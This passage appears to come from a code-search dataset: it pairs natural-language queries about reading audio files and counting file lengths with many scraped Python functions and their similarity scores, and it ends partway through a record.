n_fft=n_fft, hop_length=hop_length)\r\n\r\n # input data for the model should be 4 dimensional array: (# samples, # time steps, # coefficients, 1)\r\n MFCCs = MFCCs[np.newaxis, ..., np.newaxis]\r\n\r\n return MFCCs", "def get_dataset_length(file_path, had_header=True):\n with open(file_path, 'r') as f:\n length = 0\n for _ in f:\n length += 1\n length = length - had_header\n return length", "def __len__(self):\n return self._num_samples_per_file * len(self._files) // self._world_size", "def _get_file_length(self, file):\n self[file] = file.stat().st_size", "def file_length(fileName):\n with open(f_pass) as f:\n for i, l in enumerate(f):\n pass\n return i + 1", "def _filelength(self):\r\n with open(self.fileName, 'rb') as f:\r\n f.seek(0, 2) # move to end of file\r\n length = f.tell() # get current position\r\n return length", "def load_and_get_stats(filename):\n\n import scipy.io.wavfile as siow\n sampling_rate, amplitude_vector = siow.read(filename)\n\n wav_length = amplitude_vector.shape[0] / sampling_rate\n\n return sampling_rate, amplitude_vector, wav_length", "def countLength():\n counter = 0\n\n with open('bc.processed3.csv', 'r') as openfile:\n for line in openfile:\n counter += 1\n if counter == 1:\n print line\n\n print('Length: ', counter)", "def duration(file_path):\n command = [\"ffprobe\", \"-show_entries\", \"format=duration\", \"-i\", file_path]\n pipe = sp.Popen(command, stdout=sp.PIPE, stderr=sp.STDOUT)\n out, error = pipe.communicate()\n match_object = None if error else DURATION_REGEX.search(out.decode('utf-8'))\n if match_object is None:\n return 0\n length = float(match_object.group(1)) / 60\n return length", "def freq(self):\n a = re.search('(?<=_)[K,C,L,P]{1}(?<!_)', self.fname)\n if a is None:\n raise Exception(\"Can't determine 
frequency freq from CFX file\")\n else:\n return a.group()", "def parse_sequence_lengths(filepath, base_pair_limit):\n\n total_count = 0\n limit_count = 0\n with open(filepath) as f:\n line = f.readline()\n while line:\n if line.startswith('@'):\n total_count += 1\n seq = f.readline()\n sep = f.readline()\n qual = f.readline()\n if len(seq.strip()) > base_pair_limit:\n limit_count += 1\n line = f.readline()\n\n return limit_count / total_count", "def process_sound_file(file_path):\n\n return to_mfcc(get_wav(file_path))", "def get_Metadata_freq(metafile_science):\n\n mslist_file = open(metafile_science, 'r')\n LINES = mslist_file.readlines()\n mslist_file.close()\n\n frame = 'Frame'\n \n for i in range(len(LINES)):\n line = LINES[i]\n if line.find(frame) >=0:\n next_line = LINES[i+1]\n TOKS = next_line.split()\n chan_width = float(TOKS[10])*1000. # convert kHz to Hz\n cfreq = TOKS[12] #MHz\n nchan = TOKS[7]\n\n return chan_width, cfreq, nchan", "def find_dimesion(filename):\n file = open(filename,\"r\")\n\n line = file.readline()\n file.close()\n return len(line.split())", "def checkfrequency(inputgiven):\n data_size = 40000\n wav_file = wave.open(inputgiven, 'r')\n data = wav_file.readframes(data_size)\n wav_file.close()\n data = struct.unpack('{n}h'.format(n=data_size), data)\n print max(data)", "def num_frames(length, fsize, fshift):\n pad = (fsize - fshift)\n if length % fshift == 0:\n M = (length + pad * 2 - fsize) // fshift + 1\n else:\n M = (length + pad * 2 - fsize) // fshift + 2\n return M", "def countCharacters(file_name, start, end):\r\n\r\n with open(file_name, \"r\") as file:\r\n counter_chars = 0\r\n\r\n for line in islice(file, start, end):\r\n counter_chars += len(line)\r\n\r\n return counter_chars", "def get_fcc_diameters():\n catalog = Table.read(os.path.join(context.tables_dir, \"FCC_likely.fits\"))\n results = []\n for gal in catalog:\n galtab = Table()\n name = \"FCC {}\".format(gal[\"FCC\"])\n size_cat = gal[\"Reff\"]\n size_ned = query_size(name)\n size = np.max([size_cat, size_ned])\n galtab[\"Major Axis\"] = [size] * u.arcsec\n results.append(galtab)\n results = vstack(results)\n results.write(os.path.join(context.tables_dir, \"FCC_sizes.fits\"),\n overwrite=True)", "def countSamples(filename):\n with open(filename, \"r\") as f:\n line = f.readline().split(\"\\t\")\n return len(line) - 2", "def mfcc(\n frames: np.ndarray,\n sample_rate: int,\n n_mfcc: int = 20,\n dct_type: int = 2,\n lifter: int = 0,\n *,\n kwargs={},\n):\n l = []\n for frame in frames:\n l.append(\n np.mean(\n librosa.feature.mfcc(\n y=frame,\n sr=sample_rate,\n n_mfcc=n_mfcc,\n dct_type=dct_type,\n lifter=lifter,\n **kwargs\n ).T, axis=0\n )\n )\n return np.array(l)", "def mvarlen():\n\n global offset\n\n x=0L\n for i in range(4):\n\n try:\n byte=ord(midifile[offset])\n offset += 1\n except:\n error(\"Invalid MIDI file include (varlen->int)\")\n\n if byte < 0x80:\n x = ( x << 7 ) + byte\n break\n else:\n x = ( x << 7 ) + ( byte & 0x7f )\n\n return int(x)", "def get_counts(filename, alphabet, kmin, kmax):\n # get the list of kmers to count with length between kmin and kmax\n kmers_list = get_all_possible_kmers(alphabet, kmin, kmax)\n # initialyze the counter with all possible kmer with length\n # between kmin and kmax with zero counts\n counter = Counter(dict([(km, 0) for km in kmers_list]))\n # open and read in the kmers/string in the file\n with gzip.open(filename, 'rt') as fh:\n # iterates through the strings\n for line in fh:\n # make the adjustments int the strings\n kmer = line.replace('\\n', 
'')\n # check if kmer/string is in the counter\n if kmer in counter:\n # if kmer is in add 1 other wise keep the zero count\n counter[kmer] += 1\n return counter", "def max_min_kmer_sizes(filename):\n try:\n fh = gzip.open if isgzip(filename) else open\n with fh(filename, 'rt') as f:\n kmer_sizes = np.array([len(rec.split()[0]) for rec in f])\n\n return kmer_sizes.min(), kmer_sizes.max()\n\n except Exception:\n print('Not able to read file [%s]\\n' % filename)\n raise", "def Lof(channel):\n return FileLen(VBFiles.getFile(channel).name)", "def total_file_length(self):\n if self.is_multi_file():\n return sum([file['length'] for file in self.torrent['info']['files']])\n else:\n # single file\n return self.torrent['info']['length']", "def cnt_freq(filename):\n freq = [0] * 256\n try:\n f_in = open(filename,'r')\n except:\n raise FileNotFoundError\n for line in f_in:\n for char in line:\n freq[ord(char)] = freq[ord(char)] + 1\n f_in.close()\n return freq", "def count_seqs_from_file(fasta_file, parser=parse_fasta):\r\n result = 0\r\n lens = []\r\n for record in parser(fasta_file):\r\n result += 1\r\n lens.append(len(record[1]))\r\n if result == 0:\r\n return result, None, None\r\n else:\r\n return result, mean(lens), std(lens)", "def _read_file_for_magnets(sequence_file):\n LOG.debug(\" Reading File\")\n length_constants = {}\n magnet_strings = {}\n with open(sequence_file, 'r') as f_seq:\n for line in f_seq:\n var_and_value = _find_element_length(line)\n if var_and_value is not None:\n length_constants[var_and_value[0]] = var_and_value[1]\n else:\n var_and_value = _find_magnet_strength(line)\n if var_and_value is not None:\n magnet_strings[var_and_value[0]] = var_and_value[1]\n return magnet_strings, length_constants", "def mcc(self):\n tp = self.tp\n tn = self.tn\n fp = self.fp\n fn = self.fn\n return tp * tn / np.sqrt((tp + fp) * (tp + fn) * (tn + fp) * (tn + fn))", "def mfcc(samples, winlen, winshift, nfft, nceps, samplingrate):\n\n enframes = enframe(samples, winlen, winshift)\n # preemp_signal = map(lambda x: preemp(x, 0.97), enframes)\n preemp_signal = preemp(enframes, p=0.97)\n hamWindow = hamming(winlen, False)\n ham_signal = helper.combineHam(preemp_signal, hamWindow)\n\n if not nfft:\n nfft = 512\n\n spec, logspec_fft = fft(ham_signal, nfft);\n\n bank1 = tools.trfbank(samplingrate, nfft);\n mspec = helper.melSpec(spec, bank1)\n spec_dct = helper.cosineTransform(mspec)\n ceps = spec_dct[:, :nceps]\n\n return (spec, mspec, ceps)", "def mfcc(self, coeff_count=13, bell=False):\n samps = self.samples\n sound_length = self.length\n if bell:\n # Update the samples, the bell_time, and the length of\n # sound.\n samps, bell_time, sound_length = self.append_bell(samps)\n\n mfcc_seq = feature.mfcc(samps, sr=self.sr, n_mfcc=coeff_count)\n mfcc_sr = mfcc_seq.shape[1] / sound_length\n print(\"AudioClip--MFCC Sequence Generated\")\n if bell:\n return mfcc_seq, mfcc_sr, bell_time\n return mfcc_seq, mfcc_sr", "def get_file_size(fname, size_length):\n size = os.path.getsize(fname)\n return hex_encode(size, size_length)", "def get_data_duration(meta_file_name):\n try:\n with open(meta_file_name) as meta_file:\n info = kaa_metadata.parse(meta_file)\n except IOError:\n config_pytomo.LOG.error('Unable to open tempfile for kaa_metadata')\n\n if (info and 'length' in info):\n data_duration = info.length\n return data_duration", "def test(self, filename):\n hit = 0\n total = 0\n n = self.n\n for sent in open(filename):\n samp = sent.rstrip('\\n')\n# samp = '~' + samp + '~' \n for i in range(len(samp) - n):\n 
total = total + 1\n prev = samp[i:i + n - 1]\n pred = self.pred(prev)\n if pred == samp[i + n - 1]:\n hit = hit + 1\n \n return hit/total", "def get_cc(filename):\n logging.debug(f\"Trying to extract CC from {filename}\")\n try:\n filepath = Path(filename)\n assert filepath.exists()\n except Exception:\n logging.error(f\"Could not find a file to read at {filename}\")\n raise Exception(f\"Could not find a file to read at {filename}\")\n\n try:\n with open(filepath) as f:\n text = f.read()\n cc_string = re.findall(\"(?<=with CC)[ ]+[0-9]+.[0-9]+\", text)\n cc = float(cc_string[0].replace(\" \", \"\"))\n except Exception:\n logging.error(f\"Could not find CC in {filepath}\")\n raise\n\n return cc", "def analyze_text(filename):\n lines = 0\n characters = 0\n with open(filename, \"r\") as f:\n for line in f:\n lines += 1\n characters += len(line)\n return lines, characters", "def mfcc_features(y, sr, n_mels=128, n_mfcc=13):\n # Analyze only first second\n y = y[0:sr]\n\n # Calculate MFCCs (Mel-Frequency Cepstral Coefficients)\n mel_spectrum = librosa.feature.melspectrogram(y,\n sr=sr,\n n_mels=n_mels)\n log_spectrum = librosa.amplitude_to_db(mel_spectrum,\n ref=np.max)\n mfcc = librosa.feature.mfcc(S=log_spectrum,\n sr=sr,\n n_mfcc=n_mfcc)\n\n if mfcc.shape[-1] < DELTA_WIDTH:\n raise RuntimeError('MFCC vector does not contain enough time steps')\n\n if not mfcc.any():\n return np.zeros(n_mfcc * 3)\n\n # Standardize feature for equal variance\n delta_mfcc = librosa.feature.delta(mfcc, width=DELTA_WIDTH)\n delta2_mfcc = librosa.feature.delta(mfcc, order=2, width=DELTA_WIDTH)\n feature_vector = np.concatenate((\n np.mean(mfcc, 1),\n np.mean(delta_mfcc, 1),\n np.mean(delta2_mfcc, 1)))\n feature_vector = (\n feature_vector - np.mean(feature_vector)\n ) / np.std(feature_vector)\n\n return feature_vector", "def count_kmers(file_name, k, verbose=False):\n if verbose:\n start = time.time()\n print('Counting kmers in {}'.format(file_name))\n total_kmers = 0\n with open(file_name, 'r') as f:\n line_num = 0\n for line in f:\n if line_num % 4 == 1: # dna sequence\n total_kmers += len(line) - k # eliminate new-line\n line_num += 1\n if verbose:\n end = time.time()\n print('{} kmers are counted in {:.2f} seconds'.format(\n total_kmers, end - start))\n return total_kmers", "def has_fcc(self):\n raise NotImplementedError", "def mfcc(samples, winlen = 400, winshift = 200, preempcoeff=0.97, nfft=512, nceps=13, samplingrate=20000, liftercoeff=22):\n mspecs = mspec(samples, winlen, winshift, preempcoeff, nfft, samplingrate)\n ceps = cepstrum(mspecs, nceps)\n return lifter(ceps, liftercoeff)", "def get_track_length(track_path):\n track_extension = os.path.splitext(track_path)[1]\n if track_extension:\n try:\n mutagen_track = File(track_path)\n track_total_length = mutagen_track.info.length\n except:\n track_total_length = 0\n tkinter.messagebox.showwarning(\n title=\"Warning!\", message=f\"Audio file incorrect : {track_path}\")\n finally:\n track_length_formated = strftime(\n '%M:%S', gmtime(track_total_length))\n track_length_label.configure(text=track_length_formated)\n track_pos_slider.configure(to=track_total_length)\n return track_total_length", "def load_lengths(filename, return_base=False):\n data = pd.read_csv(filename, sep=\"\\t\", comment=\"#\", header=None)\n data = data.as_matrix()\n _, idx, lengths = np.unique(data[:, 0], return_counts=True,\n return_index=True)\n if return_base:\n return lengths[idx.argsort()], data[0, 3]\n else:\n return lengths[idx.argsort()]", "def flnc_readlength_csv(self):\n 
return op.join(self.csv_dir, \"flnc_readlength.csv\")", "def count_words_in_file(file_name):\n\n\treturn len(get_words_in_file(file_name))", "def dir_resolution(self, src_path, frag_length=128):\n src_path = os.path.join(self.root_path, src_path)\n files = os.listdir(src_path)\n\n MFCCs = None\n labels = None\n cnt = 1\n total_num = len(files)\n for wav in files:\n wav_path = os.path.join(src_path, wav)\n MFCCs_each, labels_each = self.features_and_labels(wav_path, frag_length)\n if MFCCs is not None:\n MFCCs = torch.cat((MFCCs, MFCCs_each))\n labels = torch.cat((labels, labels_each))\n else:\n MFCCs, labels = MFCCs_each, labels_each\n\n if cnt % 1000 == 0:\n print('{} data pieces have been loaded in and {} are left'.format(cnt, total_num-cnt))\n cnt += 1\n\n np.save(self.feature_file, MFCCs.numpy()) \n np.save(self.label_file, labels.numpy())\n print('Loading into files finished!')", "def get_duration_sox_n(audio_file_path: str) -> float:\n global FS_HZ\n assert FS_HZ is not None\n audiometadata = torchaudio.info(audio_file_path)\n num_frames = audiometadata.num_frames\n original_fs_hz = audiometadata.sample_rate\n duration_n = num_frames\n # TODO(theis): probably not exact value\n duration_n_resampled = round(duration_n * (FS_HZ / original_fs_hz))\n return duration_n_resampled", "def features_and_labels(soundfile, frag_length=128):\n label = soundfile.split('\\\\')[-1].split('_')[0]\n waveform, sample_rate = torchaudio.load(soundfile)\n MFCCs = transforms.MFCC(n_mfcc=128, melkwargs={'n_mels':128, 'win_length':320, 'hop_length':160, 'n_fft':1024 })(waveform[0][:])\n MFCCs = MFCCs.T.view((-1, frag_length, 128)) # transform the shape into (index, time_representation, melbands)\n\n frag_nums = MFCCs.shape[0]\n labels = int(label)*np.ones(frag_nums, dtype=np.int8)\n labels = torch.from_numpy(labels)\n\n return MFCCs, labels", "def _file_scale(fn):\n s = utils.file_word(fn)\n try:\n n = int(s, 0)\n except ValueError:\n n = float(s)\n return n", "def mfcc(samples, winlen=400, winshift=200, preempcoeff=0.97, nfft=512, nceps=13, samplingrate=20000, liftercoeff=22):\n frames = enframe(samples, winlen, winshift)\n preemph = preemp(frames, preempcoeff)\n windowed = windowing(preemph)\n spec = powerSpectrum(windowed, nfft)\n mspec = logMelSpectrum(spec, samplingrate)\n ceps = cepstrum(mspec, nceps)\n return lifter(ceps, liftercoeff)", "def lws_num_frames(length, fsize, fshift):\n pad = (fsize - fshift)\n if length % fshift == 0:\n M = (length + pad * 2 - fsize) // fshift + 1\n else:\n M = (length + pad * 2 - fsize) // fshift + 2\n return M", "def _calc_ctc_input_length(args):\n # py2 needs explicit tf import for keras Lambda layer\n import tensorflow as tf\n\n input_length, input_data, y_pred = args\n max_time_steps = tf.shape(input_data)[1]\n ctc_time_steps = tf.shape(y_pred)[1]\n ctc_input_length = tf.multiply(\n tf.to_float(input_length), tf.to_float(ctc_time_steps))\n ctc_input_length = tf.to_int32(tf.floordiv(\n ctc_input_length, tf.to_float(max_time_steps)))\n return ctc_input_length", "def ccs_readlength_csv(self):\n return op.join(self.csv_dir, \"ccs_readlength.csv\")", "def mfcc(signal, sampling_rate, factor=0.095, frame_size=0.025, frame_overlap=0.015, NFFT=512, num_filt = 40):\n pre_emphasized = pre_emphasize(signal)\n frames = make_frames(pre_emphasized, rate)\n\n #FFT and Power Spectrum\n #NFFT = 512\n mag_frames = np.absolute(np.fft.rfft(frames, NFFT)) # Magnitude of the FFT\n power_frames = ((1.0 / NFFT) * (np.power(mag_frames,2))) # Power Spectrum\n\n filter_banks = 
make_filter_banks(power_frames, rate, NFFT)\n\n #MFCC\n num_ceps = 20\n mfcc_40 = dct(filter_banks, type=2, axis=1, norm='ortho') \n mfcc = mfcc_40 #[:, 1 : (num_ceps + 1)] # Keep 2-13\n\n #Mean Normalization\n mfcc = mfcc - (np.mean(mfcc, axis=0) + 1e-6)\n\n mfcc_features = np.hstack((np.mean(mfcc.T, axis=1), np.std(mfcc.T, axis=1), skew(mfcc.T, axis = 1), \n np.max(mfcc.T, axis = 1), np.median(mfcc.T, axis = 1), np.min(mfcc.T, axis = 1)))\n \n return mfcc_features", "def count_words(filename):", "def load_mfccs(fnames):\n if isinstance(fnames, str):\n return load_mfccs_file(fnames)\n mfccs = []\n dists = []\n cats = []\n for fname in fnames:\n m, d, c = load_mfccs_file(fname)\n mfccs.extend(m)\n dists.append(d)\n cats.append(c)\n dists = np.concatenate(dists)\n cats = np.concatenate(cats)\n return mfccs, dists, cats", "def test_get_length_of_canonical_transcript(self):\n assert self.icd.get_length_of_canonical_transcript(\"ENSG00000171448\") == 4441\n assert self.icd.get_length_of_canonical_transcript(\"ENSG00000140157\") == 3225", "def get_line_length(file_path):\n with open(file_path, 'rb+') as f:\n return len(f.readline())", "def _get_scfinfo(self, file):\n f = open_general(file)\n tmptxt = f.readlines()\n f.close()\n # get rms and number of iterations\n itmp, niter, rms = 0, -1, -1\n while itmp >= 0:\n itmp = search_string('average rms-error', tmptxt)\n if itmp >= 0:\n tmp = tmptxt.pop(itmp).replace('D', 'E').split()\n niter = int(tmp[1])\n rms = float(tmp[-1])\n # get max number of scf steps\n itmp = search_string('SCFSTEPS', tmptxt)\n if itmp >= 0:\n nitermax = int(tmptxt.pop(itmp).split()[-1])\n # get qbound\n itmp = search_string('QBOUND', tmptxt)\n if itmp >= 0:\n qbound = float(tmptxt.pop(itmp).split()[-1])\n # get imix\n itmp = search_string('IMIX', tmptxt)\n if itmp >= 0:\n imix = int(tmptxt.pop(itmp).split()[-1])\n # get mixfac\n itmp = search_string('MIXFAC', tmptxt)\n if itmp >= 0:\n mixfac = float(tmptxt.pop(itmp).split()[-1])\n # get fcm\n itmp = search_string('FCM', tmptxt)\n if itmp >= 0:\n fcm = float(tmptxt.pop(itmp).split()[-1])\n # set mixinfo\n mixinfo = [imix, mixfac, qbound, fcm]\n # set converged and nmax_reached logicals\n converged, nmax_reached = False, False\n if nitermax==niter: nmax_reached = True\n if rms<qbound: converged = True\n # return values\n return niter, nitermax, converged, nmax_reached, mixinfo", "def getFileCount(self) -> int:\n ...", "def get_length(self):\r\n check_mixer()\r\n frequency, format, channels = (ffi.new('int*'), ffi.new('uint16_t*'),\r\n ffi.new('int*'))\r\n sdl.Mix_QuerySpec(frequency, format, channels)\r\n if format == sdl.AUDIO_S8 or format == sdl.AUDIO_U8:\r\n mixerbytes = 1.0\r\n else:\r\n mixerbytes = 2.0\r\n numsamples = self.chunk.alen / mixerbytes / channels[0]\r\n return numsamples / frequency[0]", "def count_len(self):\n total = 0\n for filename in self.filenames:\n f = open(os.path.join(self.directory, filename))\n line_count = 0\n for _ in f:\n line_count += 1\n if line_count < self.window_size:\n continue\n else:\n total += line_count - self.window_size + 1\n return total", "def file_len(fname):\n \n with open(fname) as f:\n for i, l in enumerate(f):\n pass\n return i + 1", "def total_number():\r\n total_number = 0\r\n file_read = read_file()\r\n for key in file_read:\r\n total_number = total_number + len(file_read[key])\r\n return total_number", "def calculate_mixture_features(args):\n workspace = args.workspace\n speech_dir = args.speech_dir\n noise_dir = args.noise_dir\n data_type = args.data_type\n fs = 
cfg.sample_rate\n dir_name = args.dir_name\n\n fid_clean = open(speech_dir, 'r')\n lines_clean = fid_clean.readlines()\n fid_clean.close()\n\n fid_reverb = open(noise_dir, 'r')\n lines_reverb = fid_reverb.readlines()\n fid_reverb.close()\n\n for files_clean, files_reverb in zip(lines_clean, lines_reverb):\n\n files_clean = files_clean.strip('\\n')\n files_reverb = files_reverb.strip('\\n')\n\n fid = open(files_clean,'r')\n wavLines_clean = fid.readlines()\n fid.close()\n fid = open(files_reverb,'r')\n wavLines_reverb = fid.readlines()\n fid.close()\n\n cnt = 0 \n\n for wavs_clean, wavs_reverb in zip(wavLines_clean, wavLines_reverb):\n \n t1 = time.time()\n # cnt = 0\n\n wav_name_clean, wav_path_clean = wavs_clean.split()\n wav_name_reverb, wav_path_reverb = wavs_reverb.split()\n \n # Read clean speech audio. \n (speech_audio, _) = read_audio(wav_path_clean, target_fs=fs)\n \n # Read reverb speech audio. \n (noise_audio, _) = read_audio(wav_path_reverb, target_fs=fs)\n \n # Cut reverb speech to the same length as clean speech. \n if len(noise_audio) > len(speech_audio):\n noise_audio = noise_audio[0: len(speech_audio)]\n \n # Extract spectrogram. \n mixed_complx_x = calc_sp(noise_audio, mode='complex')\n speech_x = calc_sp(speech_audio, mode='magnitude')\n\n # Write out features. \n out_feat_path = os.path.join(workspace, \"features\", \"spectrogram\", \n data_type, dir_name, \"%s.p\" % wav_name_reverb)\n create_folder(os.path.dirname(out_feat_path))\n data = [mixed_complx_x, speech_x, wav_name_reverb]\n pickle.dump(data, open(out_feat_path, 'wb'), protocol=pickle.HIGHEST_PROTOCOL)\n \n # Print. \n if cnt % 100 == 0:\n print(cnt)\n # print(mixed_complx_x)\n # print(speech_x)\n \n cnt += 1\n\n print(\"Extracting feature time: %s\" % (time.time() - t1))", "def corpus_length(corpus):\n corpus_len = len(corpus)\n return corpus_len", "def test_character_count(self):\n self.assertEqual(analyze_text(self.filename)[1], 132)", "def calculate_correction(filedic):\n lanczos_cera = xr.open_mfdataset(filedic['lanczos(CERA)'], combine='by_coords')\n lanczos_noaa = xr.open_mfdataset(filedic['lanczos(20CR)'], combine='by_coords')\n return lanczos_noaa.drop('number').squeeze() - lanczos_cera.drop('number').squeeze()", "def parseFileLength(data_socket):\r\n fileLength = b'';\r\n i = 0;\r\n while (i < 4):\r\n fileLength = fileLength + next_byte(data_socket);\r\n i += 1;\r\n return int.from_bytes(bytes=fileLength, byteorder='big')", "def len(self):\n # print(self.processed_file_names)\n return self.len_", "def mfcc_features(self, audio, rate, numcep = 20, nfft = 2000, N = 2):\n self.mfcc = python_speech_features.mfcc(audio, rate, numcep = numcep, nfft = nfft)\n #self.mfcc = preprocessing.scale(self.mfcc)\n \n self.delta_mfcc = python_speech_features.delta(self.mfcc, N)\n \n self.mfcc_feature = np.hstack((self.mfcc, self.delta_mfcc))\n \n return self.mfcc_feature", "def file_len(filename):\n with open(filename) as f:\n for i, l in enumerate(f):\n pass\n return i + 1", "def get_size(fname):\n return os.path.getsize(fname)", "def get_num_features(corpus_file, side):\n if side == 'src':\n num_feats = 0\n else:\n with codecs.open(corpus_file, \"r\", \"utf-8\") as cf:\n f_line = cf.readline().strip().split()\n _, _, num_feats = ImageDataset.extract_text_features(f_line)\n\n return num_feats", "def _get_diameter(self,filename,maxLen=3):\n filename = os.path.splitext(filename)[0] \n filename = os.path.split(filename)[1] \n filename = filename.split(\"_\",3)[2] \n diameter = filename \n return diameter", "def 
countDataSize(self,filename):\n \n try:\n d = h5py.File(filename,'r')\n except:\n print(filename)\n return \n\n N = 0\n scan_edges = d['level2/Statistics/scan_edges'][:]\n for (start,end) in scan_edges:\n N += (end-start)//self.offsetLen * self.offsetLen\n d.close()\n\n N = N*self.Nfeeds\n\n self.chunks += [[int(self.Nsamples), int(self.Nsamples+N)]]\n self.datasizes += [int(N/self.Nfeeds)]\n self.Nsamples += int(N)", "def cm_lengths(starts, stops, recombination_data):\n np_starts = np.array(starts, dtype = np.uint32, copy = False)\n np_stops = np.array(stops, dtype = np.uint32, copy = False)\n cm_starts = cumulative_cm(np_starts, recombination_data)\n cm_stops = cumulative_cm(np_stops, recombination_data)\n return cm_stops - cm_starts", "def test_character_count(self):\n self.assertEqual(analyze_text(self.filename)[1], 970)", "def get_file_size(fname):\n return os.path.getsize(fname)", "def get_length(dna):\n return len (dna)", "def initialize_lengths():\n global length\n for id in document_filenames:\n l = 0\n for term in dictionary:\n l += imp(term,id)**2\n length[id] = math.sqrt(l)", "def get_feature_size_per_file(self, f_name):\n shape = utils_classif.get_shape(os.path.join(f_name.replace('.data', '.shape')))\n return shape[1]" ]
[ "0.6658678", "0.6523835", "0.6392451", "0.61464643", "0.5918345", "0.58868235", "0.5885237", "0.5809652", "0.5772686", "0.5743787", "0.57237357", "0.56915265", "0.5688", "0.5644551", "0.56252927", "0.5590044", "0.5578385", "0.55762726", "0.5562501", "0.5446046", "0.54189724", "0.541193", "0.5410561", "0.539335", "0.5343389", "0.53327954", "0.5316296", "0.53156567", "0.530105", "0.53002346", "0.529915", "0.5292487", "0.5285933", "0.5285453", "0.5271441", "0.5251416", "0.52339643", "0.5223239", "0.5220479", "0.5215434", "0.52027273", "0.51983106", "0.5197991", "0.5183105", "0.51800346", "0.51799744", "0.51799405", "0.51689553", "0.5151221", "0.5117632", "0.50906444", "0.5085703", "0.5077205", "0.50608015", "0.5055542", "0.5039815", "0.5036883", "0.5036621", "0.5026046", "0.5024728", "0.5023211", "0.50135905", "0.5006779", "0.4994611", "0.49819922", "0.4978587", "0.49747068", "0.49716604", "0.49681303", "0.49677026", "0.49662483", "0.49652442", "0.49578127", "0.49562714", "0.49491176", "0.49483776", "0.49481547", "0.49478328", "0.49411678", "0.49355662", "0.49322644", "0.49281636", "0.4921091", "0.49151975", "0.4913752", "0.4905058", "0.49047014", "0.4903016", "0.49018192", "0.4900778", "0.4900119", "0.4896181", "0.48961732", "0.48905206", "0.48835605", "0.48774016", "0.48729452", "0.48668468", "0.48593843", "0.48584476" ]
0.60624254
4
Reads in audio file, processes it
def process_audio_file(self, file_name):
    sig, sr = librosa.load(file_name, mono=True)
    return self._extract_function(sig, sr)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def read_audio(f, downmix):\n if f.endswith('.mp3'):\n f = _mp3_hook(f)\n sr, audio = scipy.io.wavfile.read(f)\n if not audio.dtype is np.float32:\n audio = _normalize_pcm(audio)\n if downmix and len(audio.shape) == 2:\n audio = down_mix(audio)\n return sr, audio", "def audioRead(path):\n data, samplerate = sf.read(path)\n frames = data.shape[0]\n channels = len(data.shape)\n duration = 1/samplerate*frames\n return data, samplerate, path, duration, frames, channels", "def read_sound(self, inFile):\n\n # Python can natively only read \"wav\" files. To be flexible, use \"ffmpeg\" for conversion for other formats\n if not os.path.exists(inFile):\n print('{0} does not exist!'.format(inFile))\n raise FileNotFoundError\n \n (root, ext) = os.path.splitext(inFile)\n if ext[1:].lower() != 'wav':\n if self.ffmpeg_info.ffmpeg == None:\n print('Sorry, need FFMPEG for non-WAV files!')\n self.rate = None\n self.data = None\n raise NoFFMPEG_Error\n \n outFile = root + '.wav'\n cmd = [self.ffmpeg_info.ffmpeg, '-i', inFile, outFile, '-y']\n subprocess.run(cmd)\n print('Infile converted from ' + ext + ' to \".wav\"')\n \n inFile = outFile\n self.source = outFile\n\n self.rate, self.data = read(inFile)\n \n # Set the filename\n self.source = inFile\n \n # Make sure that the data are in some integer format\n # Otherwise, e.g. Windows has difficulty playing the sound\n # Note that \"self.source\" is set to \"None\", in order to\n # play the correct, converted file with \"play\"\n if not np.issubdtype(self.data.dtype, np.integer):\n self.generate_sound(self.data, self.rate)\n \n self._setInfo()\n print('data read in!')", "def readAudioFile(path):\n\n extension = os.path.splitext(path)[1]\n\n try:\n # Commented below, as we don't need this\n # #if extension.lower() == '.wav':\n # #[Fs, x] = wavfile.read(path)\n # if extension.lower() == '.aif' or extension.lower() == '.aiff':\n # s = aifc.open(path, 'r')\n # nframes = s.getnframes()\n # strsig = s.readframes(nframes)\n # x = numpy.fromstring(strsig, numpy.short).byteswap()\n # Fs = s.getframerate()\n if extension.lower() == '.mp3' or extension.lower() == '.wav' or extension.lower() == '.au' or extension.lower() == '.ogg':\n try:\n audiofile = AudioSegment.from_file(path)\n except:\n print(\"Error: file not found or other I/O error. 
\"\n \"(DECODING FAILED)\")\n return -1 ,-1\n\n if audiofile.sample_width == 2:\n data = numpy.fromstring(audiofile._data, numpy.int16)\n elif audiofile.sample_width == 4:\n data = numpy.fromstring(audiofile._data, numpy.int32)\n else:\n return -1, -1\n Fs = audiofile.frame_rate\n x = numpy.array(data[0::audiofile.channels]).T\n else:\n print(\"Error in readAudioFile(): Unknown file type!\")\n return -1, -1\n except IOError:\n print(\"Error: file not found or other I/O error.\")\n return -1, -1\n\n if x.ndim == 2:\n if x.shape[1] == 2:\n x = x.flatten()\n\n return Fs, x", "def read_audio(filename, sample_rate = 44100):\n loader = essentia.standard.MonoLoader(filename = filename, sampleRate = sample_rate)\n audio = loader()\n return audio", "def process_sound_file(file_path):\n\n return to_mfcc(get_wav(file_path))", "def get_audio():\n\tbuf = None\n\tnum_new_bytes = BUFFER_SIZE // REFRESH_BUFFER_FACTOR\n\twith open(INFILE) as fifo:\n\t\twhile True:\n\t\t\tif buf is None:\n\t\t\t\tbuf = fifo.read(BUFFER_SIZE)\n\t\t\telse:\n\t\t\t\tbuf = buf[num_new_bytes:] + fifo.read(num_new_bytes)\n\t\t\tyield buf", "def audio(self):\n self.log_string += 'Audio file'\n self._media_processing()", "def process_audio(fname, output_dir, poller):\n result = []\n try:\n if poller.params.candidate_transcripts is not None:\n out_path = \"{}/{}{}\".format(output_dir, os.path.splitext(os.path.basename(fname))[0], \".json\")\n else:\n out_path = \"{}/{}{}\".format(output_dir, os.path.splitext(os.path.basename(fname))[0], \".txt\")\n audio, audio_length = load_audio(fname, poller.params.model.sampleRate())\n pred = transcribe_audio(poller.params.model, audio, candidate_transcripts=poller.params.candidate_transcripts)\n with open(out_path, \"w\") as fp:\n fp.write(pred)\n result.append(out_path)\n except KeyboardInterrupt:\n poller.keyboard_interrupt()\n except:\n poller.error(\"Failed to process audio file: %s\\n%s\" % (fname, traceback.format_exc()))\n return result", "def wavread(filename):\n\n\tif (os.path.isfile(filename) == False): # raise error if wrong input file\n\t\traise ValueError(\"Input file is wrong\")\n\n\tfs, x = read(filename)\n\n\tif (len(x.shape) !=1): # raise error if more than one channel\n x = np.mean(x,axis = 1)\n\t\tprint \"Audio file is stereo, converting to mono\"\n\n\t#scale down and convert audio into floating point number in range of -1 to 1\n\tx = np.float32(x)/norm_fact[x.dtype.name]\n\treturn fs, x", "def play_audio_file(self, fname=DETECT_DONG):\n ding_wav = wave.open(fname, 'rb')\n ding_data = ding_wav.readframes(ding_wav.getnframes())\n # with no_alsa_error():\n audio = pyaudio.PyAudio()\n stream_out = audio.open(\n 